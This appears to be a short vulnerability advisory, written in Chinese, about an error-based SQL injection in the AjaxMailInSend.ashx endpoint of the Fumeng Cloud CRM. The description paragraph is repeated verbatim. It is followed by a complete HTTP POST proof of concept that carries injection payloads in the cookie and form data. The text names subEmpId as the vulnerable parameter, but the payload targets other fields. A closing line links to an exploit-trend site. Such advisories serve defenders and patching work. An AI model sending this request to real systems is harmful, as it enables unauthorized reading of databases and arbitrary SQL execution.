Description
孚盟云CRM系统的/m/Dingding/Ajax/AjaxMailInSend.ashx接口在处理subEmpId参数时,未对用户输入的SQL语句进行有效过滤和校验,存在报错型SQL注入漏洞。攻击者可通过构造恶意的SQL注入语句,利用该漏洞非法获取数据库敏感信息,甚至执行任意SQL命令。
孚盟云CRM系统的/m/Dingding/Ajax/AjaxMailInSend.ashx接口在处理subEmpId参数时,未对用户输入的SQL语句进行有效过滤和校验,存在报错型SQL注入漏洞。攻击者可通过构造恶意的SQL注入语句,利用该漏洞非法获取数据库敏感信息,甚至执行任意SQL命令。
POST /m/Dingding/Ajax/AjaxMailInSend.ashx HTTP/1.1
Host:
Content-Type: application/x-www-form-urlencoded
Content-Length: 69
Cookie: UserCookie={"empId":"' and 1/user--"}
action=getEmpAndImg&data={"name": "' 1>user--","emplId":"' 1>user--"}
# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.